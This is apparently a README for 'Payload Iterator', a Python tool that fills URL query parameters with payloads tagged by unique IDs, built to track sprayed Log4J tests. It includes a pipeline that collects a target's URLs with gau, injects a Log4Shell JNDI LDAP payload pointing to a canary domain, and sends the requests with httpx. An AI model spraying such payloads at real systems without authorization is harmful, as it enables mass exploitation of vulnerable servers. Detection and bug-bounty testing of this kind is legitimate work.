
Parses known URLs via stdin, filters and populates parameter values with payloads using unique identifiers for better tracking.

Primary LanguagePython

Payload Iterator

Parses known URLs via stdin, filters and populates parameter values with payloads using unique identifiers for better tracking. Similar to and inspired by Tomnomnom's qsreplace. I originally created this as a way to more effectively track sprayed Log4J payloads, but this tool could be used in many different scenarios where unique identifiers are required.


usage: payload-iterator.py [-h] -p PAYLOAD [-pr PREFIX] [-o OUTPUT] [--preserve] [-s]

Populates payloads with unique identifiers into URL GET parameters.

optional arguments:
  -h, --help            show this help message and exit
  -p PAYLOAD, --payload PAYLOAD
                        Original payload to manipulate, place <id> in the position you wish to be replaced, it will be replaced with 1 -> n
  -pr PREFIX, --prefix PREFIX
                        Prefix for the payload identifier, e.g. pay<id> will result in pay1 -> pay99999
  -o OUTPUT, --output OUTPUT
                        Output file to write to
  --preserve            Preseve other URL values, limiting to one payload per URL, keeping all other values the same as entered
  -s, --silent          Do not print to stdout

Example Log4shell use case

getallurls -subs $target | python3 payload-iterator.py -o $target-urls.txt --payload '${jndi:ldap://<id>.your.canary.domain/test}' | httpx

This will populate all of the parameters in the URLs supplied by gau with the payload and iterator.

E.g. http://example.com/?param1=blah&param2=blah&param3=blah -> http://example.com/?param1=${jndi:ldap://p2.your.canary.domain/test}&param2=${jndi:ldap://p2.your.canary.domain/test}&param3=${jndi:ldap://p3.your.canary.domain/test}

To-do / Improvements

None at the moment, if you have any suggestions or improvements to be made feel free to create an issue or submit a PR.